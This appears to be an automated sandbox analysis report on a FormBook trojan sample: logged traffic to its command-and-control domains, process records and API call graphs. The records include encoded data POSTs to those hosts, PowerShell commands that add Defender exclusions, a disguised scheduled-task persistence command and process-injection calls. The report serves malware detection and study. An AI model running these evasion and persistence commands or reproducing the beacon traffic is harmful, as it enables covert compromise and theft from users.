Oct 21, 2024 13:16:29.086075068 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Mon, 21 Oct 2024 11:16:28 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 138
                                                                                                  Connection: close
                                                                                                  ETag: "66ad66a8-8a"
                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.22 | 49184 | 206.119.82.148 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 13:16:30.697880030 CEST | 2472 | OUT | POST /v5ff/ HTTP/1.1
                                                                                                  Host: www.wdgb23.top
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.wdgb23.top
                                                                                                  Content-Length: 3629
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.wdgb23.top/v5ff/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Data Ascii: o0I8bJWh= [TRUNCATED]
Oct 21, 2024 13:16:30.703522921 CEST | 1675 | OUT |
                                                                                                  Data Ascii: 9id1x8d42bwRBjdACMzLX4Zi6Mlm1+OIYUUjeVwDcdxIqje7zSQHVdVMCAhoMN/FC2rsaG+XBWJqMywoR64oZIF4E+hUV3wx4iA7jgm/NVjOI5DFe1wjlGTuTNkMwpaUF597W2evoRzHyh7XwyKmfjWrEExnWqFQJMoXc7SrMR7WjpoB2UebENfAeBdJF6NTjNf1jKslxPmBWCV+/ojAJogquXGenH8XrplBj5wSg1mq+9L7TqY
Oct 21, 2024 13:16:31.623502970 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Mon, 21 Oct 2024 11:16:31 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 138
                                                                                                  Connection: close
                                                                                                  ETag: "66ad66a8-8a"
                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.22 | 49185 | 206.119.82.148 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 13:16:33.414256096 CEST | 469 | OUT | GET /v5ff/?o0I8bJWh=6KtkYrJQJQPjnaYYjYn2UYf3+tCUC2UyI0IqyotYPNah/j4zRWdFJ7rRvhmSGGewLKOTJjNwEsTAi0VkpGXovzF7okvrkNx58uXZpArpUgDeiKoUGkOd+5nnUTXs&IzCDX=JREpwHC8S HTTP/1.1
                                                                                                  Host: www.wdgb23.top
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Oct 21, 2024 13:16:34.383672953 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Mon, 21 Oct 2024 11:16:34 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 138
                                                                                                  Connection: close
                                                                                                  ETag: "66ad66a8-8a"
                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.22 | 49186 | 15.197.148.33 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 13:16:39.629641056 CEST | 2472 | OUT | POST /0l08/ HTTP/1.1
                                                                                                  Host: www.childlesscatlady.today
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.childlesscatlady.today
                                                                                                  Content-Length: 2165
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.childlesscatlady.today/0l08/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Data Ascii: o0I8bJWh= [TRUNCATED]
Oct 21, 2024 13:16:39.635128975 CEST | 247 | OUT |
                                                                                                  Data Ascii: ZAyvixhBpfwYoXS4GxvnL+zfjKhh07pPDRd6I8OI7UrMD1/o3REQ+JK7UWahxwi3BZec0dDjwauDUV6JyVZMrW+XjLdiLCl1HwYKkTU/pAmnx9kvh10pohk/2lSaOj6FhTa2MCGaokIklSFzZW5MunK+SX4/hhtWsCyeou1qCpoObGVkfGj+sIutML9WoVQTJUEuEMa4xBP7PPXdgFZvAcEPMhQydhJyfWX2BB2xtsBSIRHFB14


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.22 | 49187 | 15.197.148.33 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 13:16:42.174022913 CEST | 758 | OUT | POST /0l08/ HTTP/1.1
                                                                                                  Host: www.childlesscatlady.today
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.childlesscatlady.today
                                                                                                  Content-Length: 205
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.childlesscatlady.today/0l08/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Data Ascii: o0I8bJWh=babQ0RUUieWsoxhAiWshu9XctVHpVLQMsRlvN8hu5GCFtmu/j1rnTZW2CX5B6rBPm7MT8VZuP9FNIXzyEBI17Q2pbHXxNx9oSdQrGooCtrBhIfvdW+EFU9gqV5dN2Es7hGEMxYW3x5wd/svyRwEGRNCOO6HiOHx8yRPlpcCPVoqVjxDbclEY65c16/E518rnRQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.22 | 49188 | 15.197.148.33 | 80 | 1564 | C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 13:16:44.715029955 CEST | 2472 | OUT | POST /0l08/ HTTP/1.1
                                                                                                  Host: www.childlesscatlady.today
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.childlesscatlady.today
                                                                                                  Content-Length: 3629
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.childlesscatlady.today/0l08/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port
22 | 192.168.2.22 | 49189 | 15.197.148.33 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 13:16:47.254251957 CEST | 481 | OUT | GET /0l08/?o0I8bJWh=WYzw3m0wqer1rwFfiUwXr6rnqmqwc587r0oEUdRC5DK7wXWam3jpYKn/a30V+PURl6w9nm91Zal+YxrVMngOiDDKZET7LCtjetsFGO1YqrEJE528b4AnIbgsZ84h&IzCDX=JREpwHC8S HTTP/1.1
                                                                                                  Host: www.childlesscatlady.today
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Oct 21, 2024 13:16:48.791564941 CEST | 404 | IN | HTTP/1.1 200 OK
                                                                                                  Server: openresty
                                                                                                  Date: Mon, 21 Oct 2024 11:16:48 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 264
                                                                                                  Connection: close
                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?o0I8bJWh=WYzw3m0wqer1rwFfiUwXr6rnqmqwc587r0oEUdRC5DK7wXWam3jpYKn/a30V+PURl6w9nm91Zal+YxrVMngOiDDKZET7LCtjetsFGO1YqrEJE528b4AnIbgsZ84h&IzCDX=JREpwHC8S"}</script></head></html>


                                                                                                  Target ID:0
                                                                                                  Start time:07:14:40
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Users\user\Desktop\ekte.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\ekte.exe"
                                                                                                  Imagebase:0x13d0000
                                                                                                  File size:738'312 bytes
                                                                                                  MD5 hash:A0F5D21AB28654F9310E591044950160
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:2
                                                                                                  Start time:07:14:42
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe"
                                                                                                  Imagebase:0x340000
                                                                                                  File size:427'008 bytes
                                                                                                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:4
                                                                                                  Start time:07:14:43
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
                                                                                                  Imagebase:0x340000
                                                                                                  File size:427'008 bytes
                                                                                                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:6
                                                                                                  Start time:07:14:43
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp"
                                                                                                  Imagebase:0x640000
                                                                                                  File size:179'712 bytes
                                                                                                  MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:8
                                                                                                  Start time:07:14:44
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Users\user\Desktop\ekte.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\ekte.exe"
                                                                                                  Imagebase:0x13d0000
                                                                                                  File size:738'312 bytes
                                                                                                  MD5 hash:A0F5D21AB28654F9310E591044950160
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:9
                                                                                                  Start time:07:14:47
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Windows\System32\taskeng.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:taskeng.exe {F5042694-6DBB-4431-8D77-CD30DFD414D8} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                                                                  Imagebase:0xff6a0000
                                                                                                  File size:464'384 bytes
                                                                                                  MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  Target ID:10
                                                                                                  Start time:07:14:49
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe
                                                                                                  Imagebase:0xe70000
                                                                                                  File size:738'312 bytes
                                                                                                  MD5 hash:A0F5D21AB28654F9310E591044950160
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 63%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:11
                                                                                                  Start time:07:14:54
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
                                                                                                  Imagebase:0x1360000
                                                                                                  File size:427'008 bytes
                                                                                                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:13
                                                                                                  Start time:07:14:55
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
                                                                                                  Imagebase:0x1360000
                                                                                                  File size:427'008 bytes
                                                                                                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:15
                                                                                                  Start time:07:14:55
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe"
                                                                                                  Imagebase:0x3e0000
                                                                                                  File size:140'800 bytes
                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  Target ID:16
                                                                                                  Start time:07:14:55
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp"
                                                                                                  Imagebase:0xb10000
                                                                                                  File size:179'712 bytes
                                                                                                  MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:18
                                                                                                  Start time:07:15:00
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
                                                                                                  Imagebase:0xe70000
                                                                                                  File size:738'312 bytes
                                                                                                  MD5 hash:A0F5D21AB28654F9310E591044950160
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:19
                                                                                                  Start time:07:15:01
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\SysWOW64\findstr.exe"
                                                                                                  Imagebase:0xa20000
                                                                                                  File size:62'976 bytes
                                                                                                  MD5 hash:18F02C555FBC9885DF9DB77754D6BB9B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                  Has exited:false

                                                                                                  Target ID:20
                                                                                                  Start time:07:15:13
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe"
                                                                                                  Imagebase:0x3e0000
                                                                                                  File size:140'800 bytes
                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  Has exited:false

                                                                                                  Target ID:23
                                                                                                  Start time:07:15:29
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                                                                                  Imagebase:0x11a0000
                                                                                                  File size:517'064 bytes
                                                                                                  MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  Has exited:true


                                                                                                    Execution Graph

                                                                                                    Execution Coverage:14.5%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:104
                                                                                                    Total number of Limit Nodes:4

                                                                                                    Control-flow Graph

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: :$p!p$~
                                                                                                    • API String ID: 0-320839381

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001BF6C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001BF6C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0

                                                                                                    Control-flow Graph (figure not reproduced; legend: Executed / Not Executed; first block 1bf061-1bf0d3, calls WriteProcessMemory)
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 001BF13B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0

                                                                                                    Control-flow Graph (figure not reproduced; legend: Executed / Not Executed; first block 1bf068-1bf0d3, calls WriteProcessMemory)
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 001BF13B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0

                                                                                                    Control-flow Graph (figure not reproduced; legend: Executed / Not Executed; first block 1bf1c0-1bf290, calls ReadProcessMemory)
                                                                                                    APIs
                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 001BF27A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1726664587-0

                                                                                                    Control-flow Graph (figure not reproduced; legend: Executed / Not Executed; first block 1bf1c8-1bf290, calls ReadProcessMemory)
                                                                                                    APIs
                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 001BF27A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1726664587-0

                                                                                                    Control-flow Graph (figure not reproduced; legend: Executed / Not Executed; first block 1bef38-1bf000, calls VirtualAllocEx)
                                                                                                    APIs
                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 001BEFEA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0

                                                                                                    Control-flow Graph (figure not reproduced; legend: Executed / Not Executed; first block 1bef40-1bf000, calls VirtualAllocEx)
                                                                                                    APIs
                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 001BEFEA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
